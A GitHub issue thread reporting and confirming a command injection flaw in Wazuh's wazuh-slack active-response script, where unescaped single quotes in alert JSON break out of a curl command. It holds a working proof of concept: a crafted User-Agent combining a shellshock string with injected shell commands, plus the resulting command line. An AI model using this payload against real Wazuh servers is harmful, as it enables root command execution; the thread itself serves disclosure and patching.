### ISSUE TITLE
Command injection in wazuh-slack

### ISSUE THREAD

**Issue by rk700** [wazuh/wazuh#10731]
|Wazuh version|Component|Install type|Install method|Platform|
|---|---|---|---|---|
| 4.2.4 | active-response script | Manager/Agent | Packages | CentOS 7 |

Hi,

We found a command injection bug in the active-response script [wazuh-slack](https://github.com/wazuh/wazuh/blob/master/src/active-response/wazuh-slack.c). 

The alert json data is put in the shell command line as POST body for `curl`:

```c
snprintf(system_command, OS_MAXSTR -1, "curl -H \"Accept: application/json\" -H \"Content-Type: application/json\" -d '%s' %s", output_str, site_url);
```

However the raw log line which could be partially controlled by attacker is also included in the the json data. Single quote in json is not escaped and therefore could be used to truncate the command:

```
-d '<json data that could be partially controlled>'
```

Steps to reproduce as follows.

First, we add the `wazuh-slack` active-response in the config:
```xml
  <command>
    <name>wazuh-slack</name>
    <executable>wazuh-slack</executable>
    <!-- an echo server for debug -->
    <extra_args>http://192.168.1.95:8080/test</extra_args>
  </command>

  <active-response>
    <disabled>no</disabled>
    <command>wazuh-slack</command>
    <location>server</location>
    <level>6</level>
  </active-response>
```

Then we setup a web server on the client machine, and send request with crafted User-Agent:
```bash
curl -I 192.168.1.96/1.html -A "() { :;};ls ' 192.168.1.95:8080;touch /tmp/injection;echo '"
```

The shellshock PoC will trigger an alert, and the crafted User-Agent value which is contained in web server access.log would also be included in the command line as follows:

```bash
curl -H "Accept: application/json" -H "Content-Type: application/json" -d '{"attachments":[{"color
":"danger","pretext":"WAZUH Alert","title":"Shellshock attack detected","text":"192.168.1.96 - - [04/Nov/2021:12:53:56 +0800] \"GET /1.html HTTP/1.1\" 200 5
 \"-\" \"() { :;};ls ' 192.168.1.95:8080;touch /tmp/injection;echo '\"","fields":[{"title":"Agent","value":"(001) - hids_client"},{"title":"Location","value":"/var/
log/apache2/access.log"},{"title":"Rule ID","value":"31168 (level 15)"}],"ts":"1636001638.913845"}]}' http://192.168.1.95:8080/test
```

Here we use the single quote to jump out of `-d '<json data>'` and inject the command `touch /tmp/injection` with semicolons. We can verify that on the server where the `wazuh-slack` is running(the wazuh-manager machine in this case since we set the location as `server` in the active-response config):

```
root@ubuntu:~# ls -l /tmp/injection
-rw-r--r-- 1 root ossec 0 Nov  4 17:19 /tmp/injection
```

**Comment by TomasTurina** [comment]
Hi @rk700,

You are right, in fact the problem that you describe exists and we need to fix it.

We'll think of a solution and introduce it as soon as possible.

In the meantime, to avoid this you can disable the full log from the alert. To do this, you need to add this configuration to those rules you are monitoring with slack:

```
  <options>no_full_log</options>
```

Here is the documentation for this workaround: https://documentation.wazuh.com/current/user-manual/ruleset/ruleset-xml-syntax/rules.html#options

Thank you so much for reporting this.

**Comment by branchnetconsulting** [comment]
Good catch, @rk700.  That definitely needs to be fixed.  Also, if you have not checked out the Wazuh Slack integration, I think you may like it better than the Slack AR:
